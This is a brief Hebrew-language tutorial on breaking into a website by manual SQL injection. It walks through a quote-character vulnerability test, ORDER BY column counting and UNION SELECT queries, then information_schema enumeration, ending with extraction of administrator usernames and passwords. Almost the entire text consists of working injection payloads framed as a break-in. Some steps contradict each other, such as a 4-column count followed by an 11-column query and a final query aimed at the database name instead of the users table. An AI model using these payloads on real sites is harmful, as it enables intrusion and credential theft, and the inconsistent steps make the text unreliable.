הזרקה לאתר באופן ידני
כדי לבדוק אם האתר פגיע להזרקת נצטרך להוסיף גרש (') לסוף הכתובת של האתר ואם נקבל שגיאת SQL או שחלק מהדף נעלם אז יש פגיע
לדוגמא : 'www.targetwebsite.com/index.php?id=8
עכשיו שיש לנו אתר פגיע נוכל לעבור לשב הבא
www.targetwebsite.com/index.php?id=8 Order by 1 -no error
www.targetwebsite.com/index.php?id=8 Order by 2 -no error
www.targetwebsite.com/index.php?id=8 Order by 3 -no error
www.targetwebsite.com/index.php?id=8 Order by 4 -no error
www.targetwebsite.com/index.php?id=8 Order by 5 -error
כאן באתר הזה הוא מראה שגיאה ב-5 זה אומר שיש 4 עמודות
השלב הבא הוא למצוא טור פגיע
עכשיו נריץ את מספר העמודות כמו שבדוגמא למטה כדי למצוא עמודה פגיעה
--www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4
אצלנו מצאנו עמודות פגיעות [2,3]
נעכשיו נשתמש פקודות הבאות כדי לדעת מה הגירסא והשם של DB
--www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4
5.1.66
--www.targetwebsite.com/index.php?id=-8 union select 1,user(),3,4
targetwe_bsite@localhost
--www.targetwebsite.com/index.php?id=-8 union select 1,database(),3,4
targetwe_bsite
השלב הבא
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
עכשיו נקבל את רשימת הטבלאות
דוגמא
admin
users
login
gcc_us
member
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--
(user = CHAR(117, 115, 101, 114, 115
באתר הזה אפשר לעשות CHAR לטבלאות
http://www.waraxe.us/sql-char-encoder.html
עכשיו קיבלנו רשימה של תוכן הבטלה שבחרנו במקרה שלי טבלת users
id
username
password
fullname
השלב הבא זה להוציא את השם משתמש והסיסמא מהטבלה
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(username,0x2a,password),3,4 from targetwe_bsite--
עכשיו אחרי שהצלחנו להוציא את שם משתמש והסיסמא של מנהל האתר סיימנו את שם הפריצה והוצאת המידע מהאתר
